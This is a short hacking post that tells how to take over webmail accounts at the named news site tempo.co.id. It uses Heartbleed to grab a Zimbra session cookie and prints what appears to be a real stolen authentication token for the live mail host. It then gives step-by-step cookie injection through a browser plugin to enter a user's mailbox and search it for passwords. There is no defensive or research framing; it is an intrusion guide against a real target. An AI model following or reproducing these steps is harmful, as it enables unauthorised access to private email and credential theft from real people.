How Do I Get tempo.co.id Email Login



Well this is an old vulnerablity called Heartbleed (CVE-2014-0160). Let's exploit this.

Run the Heartbleed exploit and you'll get the Zimbra cookie.


See the Referer and Cookie? Use that to login.

Referer: https://mx.tempo.co.id/
Cookie: ZM_TEST=true; ZM_AUTH_TOKEN=0_73ec70e72712cb16eaee148d405d1b8297c411f2_69643d33363a66356438353363632d633032372d343032302d383566322d3635636436366531623932313b6578703d31333a313438373232343637313230353b747970653d363a7a696d6272613b; JSESSIONID=1xv343h6xss51a0uhvn29oe6x

Open the Referer site in firefox who have installed Cookie Injector plugin https://mx.tempo.co.id/ and press alt+c to show the Cookie Injector.


You'll see "Wireshark Cookie Dump" there. Now paste the Cookie and click OK. You should have popup screen "All Cookie Have Been Written".


Refresh (F5) the site again and you are now login to user email.


Type password on search box and hit enter... :p



./NoGe